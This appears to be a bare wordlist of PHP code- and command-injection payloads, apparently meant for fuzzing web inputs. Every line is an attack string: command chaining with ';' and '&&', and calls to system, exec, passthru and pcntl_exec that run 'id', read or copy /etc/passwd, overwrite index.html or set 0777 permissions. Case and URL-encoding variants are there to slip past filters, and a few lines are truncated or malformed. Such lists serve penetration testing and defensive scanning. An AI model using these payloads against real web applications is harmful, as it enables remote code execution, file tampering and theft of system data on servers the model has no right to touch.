;id
'id'
;id;
&&id
echo 'id'
system('id')
;system('id')
system("id")
SYSTEM("id")
system(%27id%27)
system('id');phpinfo()
SYSTEM('id');PHPINFO()
;system('/usr/bin/id')
system('cat /etc/passwd');
;system('cat /etc/passwd')
shell exec("id")
SHELL EXEC("id")
exec("id")
EXEC("id")
exec("ping -c 4 192.168.1.6")
passthru("id")
PASSTHRU("id")
phpinfo()
phpinfo();id
PHPINFO()
PHPINFO();id
phpinfo();system('cat /etc/passwd')
phpinfo();system('id')
PHPINFO();SYSTEM('id')
print_r($_POST);system('id')
PRINT_R($_POST);SYSTEM('id')
pcntl_exec("/usr/bin/uptime")
readfile?"/etc/passwd")
file get contents ("/etc/passwd
passthru('id')
PASSTHRU('id')
;SYSTEM('id')
readfile("/etc/passwd");
readfile("index.html");
READFILE("index.html")
READFILE("/etc/passwd")
echo%20file_exists("index.html");
echo%20file_exists("/etc/passwd");
ECHO%20FILE_EXISTS("index.html");
ECHO%20FILE_EXISTS("/etc/passwd");
chmod("index.html",0777);
CHMOD("index.html",0777);
echo%20copy("/etc/passwd","/tmp/passwd");
echo%20file_exists("/tmp/passwd");
echo%20file_get_contents("/etc/
ECHO%20FILE_GET_CONTENTS("/etc
echo%20file_put_contents("index.html","Hello%20World.%20Testing!");
ECHO%20FILE_PUT_CONTENTS("index.html","HELLO%20WORLD.%20TESTING!");
echo%20fileperms("index.html");
echo%20fileperms("/etc/passwd");
ECHO%20FILEPERMS("index.html");
ECHO%20FILEPERMS("/etc/passwd");
print_r(glob("*.txt"));
print_r(glob("*.html"));
print_r(glob("*.config"));
